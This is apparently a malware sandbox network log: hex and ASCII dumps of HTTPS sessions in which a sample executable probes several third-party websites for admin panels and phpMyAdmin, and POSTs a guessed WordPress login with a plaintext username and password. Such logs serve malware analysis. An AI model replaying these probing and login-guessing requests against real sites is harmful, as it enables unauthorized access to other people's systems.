                                                                                                                                                                                                    Data Ascii: 3FC0or users</a></li><li class='menu-item menu-item-type-post_type menu-item-object-page item-depth-3'><a href="https://www.maxiv.lu.se/user-access/safety/in-case-of-emergency/" class="menu-item-label">In case of emergency</a></li><li class='menu-item m
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC16328INData Raw: 33 46 43 30 0d 0a 72 75 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 72 65 6d 6f 76 65 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 75 6c 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 69 74 65 6d 2d 64 65 70 74 68 2d 34 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 62 65 61 6d 6c 69 6e 65 73 2f 62 6c 6f 63 68 2f 75 73 65 72 2d 69 6e 66
                                                                                                                                                                                                    Data Ascii: 3FC0rue"><span class="material-icons-sharp">remove</span></span><ul><li class='menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children item-depth-4'><a href="https://www.maxiv.lu.se/beamlines-accelerators/beamlines/bloch/user-inf
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC16320INData Raw: 33 46 42 38 0d 0a 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 62 65 61 6d 6c 69 6e 65 73 2f 66 6c 65 78 70 65 73 2f 62 65 61 6d 6c 69 6e 65 2d 6f 70 74 69 63 73 2f 78 2d 72 61 79 2d 73 6f 75 72 63 65 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 58 2d 72 61 79 20 73 6f 75 72 63 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 69 74 65 6d 2d 64 65 70 74 68 2d 34 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74
                                                                                                                                                                                                    Data Ascii: 3FB8u.se/beamlines-accelerators/beamlines/flexpes/beamline-optics/x-ray-source/" class="menu-item-label">X-ray source</a></li></ul></li><li class='menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children item-depth-4'><a href="htt
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC16328INData Raw: 33 46 43 30 0d 0a 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 50 6f 73 74 20 62 65 61 6d 74 69 6d 65 3c 2f 61 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72 20 70 6c 75 73 2d 69 63 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 61 64 64 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72 20 64 2d 6e 6f 6e 65 20 6d 69 6e 75 73 2d 69 63 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c
                                                                                                                                                                                                    Data Ascii: 3FC0 class="menu-item-label">Post beamtime</a><span class="material-icon submenu-toggler plus-icon" aria-hidden="true"><span class="material-icons-sharp">add</span></span><span class="material-icon submenu-toggler d-none minus-icon" aria-hidden="true"><
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC16328INData Raw: 33 46 43 30 0d 0a 6c 61 62 73 2f 73 63 61 6e 6e 69 6e 67 2d 74 75 6e 6e 65 6c 69 6e 67 2d 6d 69 63 72 6f 73 63 6f 70 65 2f 73 74 6d 2d 65 78 70 65 72 69 6d 65 6e 74 61 6c 2d 73 74 61 74 69 6f 6e 2f 73 63 61 6e 6e 69 6e 67 2d 70 72 6f 62 65 2d 6d 69 63 72 6f 73 63 6f 70 65 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 4d 69 63 72 6f 73 63 6f 70 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 36 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61
                                                                                                                                                                                                    Data Ascii: 3FC0labs/scanning-tunneling-microscope/stm-experimental-station/scanning-probe-microscope/" class="menu-item-label">Microscope</a></li><li class='menu-item menu-item-type-post_type menu-item-object-page item-depth-6'><a href="https://www.maxiv.lu.se/bea
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC16328INData Raw: 33 46 43 30 0d 0a 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 63 6f 6e 74 72 6f 6c 73 2d 69 74 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 43 6f 6e 74 72 6f 6c 73 20 26 23 30 33 38 3b 20 49 54 3c 2f 61 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72 20 70 6c 75 73 2d 69 63 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 61 64 64 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d
                                                                                                                                                                                                    Data Ascii: 3FC0xiv.lu.se/beamlines-accelerators/controls-it/" class="menu-item-label">Controls &#038; IT</a><span class="material-icon submenu-toggler plus-icon" aria-hidden="true"><span class="material-icons-sharp">add</span></span><span class="material-icon subm


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    414192.168.2.450469172.67.132.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC167OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: esoft.academy
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC623INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 65 73 6f 66 74 2e 61 63 61 64 65 6d 79 2f 70 6d 61 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:44 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeLocation: https://esoft.academy/pmaCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url"
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC414INData Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 6d 61 72 67 69 6e 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 3b 7d 0a 20 20 20 20 2e 65 72 72 6f 72 20 7b 63 6f 6c 6f 72 3a 20 23 65 30 30 3b 7d 0a 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 7d 0a 20 20 20 20 68 31 20 7b 66
                                                                                                                                                                                                    Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title><style> body {margin: 20px; font-family: helvetica, sans-serif; max-width: 800px;} .error {color: #e00;} pre {font-size: 16px;} h1 {f
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 1
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    415192.168.2.45057034.136.104.2554436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC401OUTPOST /wp-login.php?wpe-login=true HTTP/1.1
                                                                                                                                                                                                    Host: tiswheels.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=dab896062cb0564a47230c1071235746
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://tiswheels.com/wp-login.php
                                                                                                                                                                                                    Content-Length: 139
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC139OUTData Raw: 6c 6f 67 3d 68 68 25 34 30 74 69 73 77 68 65 65 6c 73 2e 63 6f 6d 26 70 77 64 3d 30 39 38 70 6f 69 30 39 38 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 74 69 73 77 68 65 65 6c 73 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=hh%40tiswheels.com&pwd=098poi098&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Ftiswheels.com%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC523INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 57 50 20 45 6e 67 69 6e 65
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 26 Nov 2023 05:59:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP Engine
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC6705INData Raw: 31 61 32 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 49 53 20 4f 66 66 72 6f 61 64 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61
                                                                                                                                                                                                    Data Ascii: 1a24<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; TIS Offroad &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><script type='text/ja


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    416192.168.2.450488199.34.228.1774436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1272OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: gatewaytoearlylearning.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PublishedSiteSession=eyJpdiI6IkRGblFZYmpUVTZaZXRlak41aDlickE9PSIsInZhbHVlIjoicDZZcjdvK2hoOHJhUmp5VXBPRmJnOXQxRDJkRXdNZnVUaUlZUWZNajY4Vlo5WUNZTG1ISDdVT1cwb1N4S0Y2MHZZU3hwODdRWDZWNjBFa251cXl2MGgvSFp3UEl6ZzNUME82N3Y1MVY5MGU5MmIyTWdKWDNNNXhMdGhMQ0RnRjAiLCJtYWMiOiI3N2M0YTFhMGY2YTc5NDgzMTIxNTNkZTA1YjY5Njk5YWJhYTE2Mzc4YzM5ODg5OWY1ZTNmYzNjYmI2NzQ3NDA5IiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6Ii9HaFdPWjhha0p0ZmprRks4OFhJMnc9PSIsInZhbHVlIjoiaWRxOTdEeUg5dVJqRHVtQ0g1R3VNUWJwSDFiZUkzMWNMUWQ3ZWU5bFNpS0t4Q0ViWExvRUJDamxtNkNwaVp1V205NHVvVlJlQUVRdVVsUzJEWEFwbnk3UzBtSHZscmc5UWZ4dkpxS1grRUY0WHAyQ1ZqZkRsOTNWakxwd21DZVMiLCJtYWMiOiI5ZmIxZGJiZmFiZjJlMzZjYTVjN2ZiODE0ZmMyZDlkNTQzNmFkMWRlOGI0YjBmMDhkOWZjNGNlZmZiMmI3ZjgzIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IjUxMTZseFR4OVdFOURpd3BzcUZ1TFE9PSIsInZhbHVlIjoiT1VlNmdtbmVOaityUVE0UzY3Qjh6TFUyeVEzUzBaL29ldUs3ZjBFbC9iV3FHdG9JQmlQampzeUdwOVg4Zk5vYytQdXJTd0dGK1M1ZVZ3MzFBVHRRRE0rMDFIbWZwaHVveEMrQXB4TTlvVjJIRTE2LytvdkZHNStHb0RTanAwajciLCJtYWMiOiI2ODUzMmM0MDU0YzY4ZjJlMzBjMjUwNTFjMjYyN2E2Y2Q4Y2Y5ODk4Y2QxYjIxNTVkYjExOTE2NzRmZDUyNWViIiwidGFnIjoiIn0%3D
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1130INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 61 64 6d 69 6e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 75 62 6c 69 73 68 65 64 73 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveDate: Sun, 26 Nov 2023 05:59:44 GMTLocation: https://www.gatewaytoearlylearning.com/adminSet-Cookie: publishedsi
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC608INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 75 62 6c 69 73 68 65 64 53 69 74 65 53 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 78 68 52 55 74 53 59 32 46 33 4c 30 52 4a 56 30 68 48 4e 30 4e 74 55 44 4a 33 65 57 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 64 6e 4e 76 61 30 39 53 51 56 42 68 61 53 74 6a 56 47 30 34 4f 47 67 78 5a 6e 4e 4e 4d 48 42 69 57 56 4e 77 64 30 74 49 5a 7a 64 75 52 30 5a 58 59 54 67 33 62 6d 74 4e 54 30 39 68 53 44 64 77 56 45 64 43 62 6d 46 57 63 57 64 4e 59 58 52 76 56 6b 64 6a 52 45 5a 6e 53 45 70 78 4c 30 31 45 5a 57 55 76 63 56 42 42 63 6b 70 48 4e 55 78 54 5a 58 4a 6c 53 58 55 79 65 55 6b 30 57 6a 46 4a 55 30 4e 31 4e 6b 64 50 52 54 42 53 63 7a 46 59 56 32 46 69 55 32 34 79 51 6c 42 69 63 6e 4d 35 4f 45 31 42 4e 48
                                                                                                                                                                                                    Data Ascii: Set-Cookie: PublishedSiteSession=eyJpdiI6IkxhRUtSY2F3L0RJV0hHN0NtUDJ3eWc9PSIsInZhbHVlIjoidnNva09SQVBhaStjVG04OGgxZnNNMHBiWVNwd0tIZzduR0ZXYTg3bmtNT09hSDdwVEdCbmFWcWdNYXRvVkdjREZnSEpxL01EZWUvcVBBckpHNUxTZXJlSXUyeUk0WjFJU0N1NkdPRTBSczFYV2FiU24yQlBicnM5OE1BNH
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC434INData Raw: 31 61 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 61 64 6d 69 6e 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 61 64 6d 69 6e 3c 2f 74 69 74 6c 65
                                                                                                                                                                                                    Data Ascii: 1a6<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.gatewaytoearlylearning.com/admin'" /> <title>Redirecting to https://www.gatewaytoearlylearning.com/admin</title


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    417192.168.2.449871116.202.203.1764436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC178OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: eco-landeck.at
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC565INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 33 34 39 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 37 20 41 75 67 20 32 30 30 35 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 05:59:44 GMTContent-Type: text/html; charset=utf-8Content-Length: 13491Connection: closeX-Frame-Options: SAMEORIGINExpires: Wed, 17 Aug 2005 00:00:00 GMTCache-Control: no-store, no-cache,
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC13491INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 64 65 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 48 41 4b 20 48 4c 57 20 4c 61 6e 64 65 63 6b 2c 20 57 65 62 73 69 74 65 20 64 65 72 20 48 61 6e 64 65 6c 73 61 6b 61 64 65 6d 69 65 2c 20 64 65 72 20 4d 65 64 69 61 68 61 6b 20 4c 61 6e 64 65 63 6b 20 75 6e 64
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="de-de" dir="ltr"><head> <meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="HAK HLW Landeck, Website der Handelsakademie, der Mediahak Landeck und


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    418192.168.2.450493199.34.228.1774436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1277OUTGET /PhpMyAdmin HTTP/1.1
                                                                                                                                                                                                    Host: gatewaytoearlylearning.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
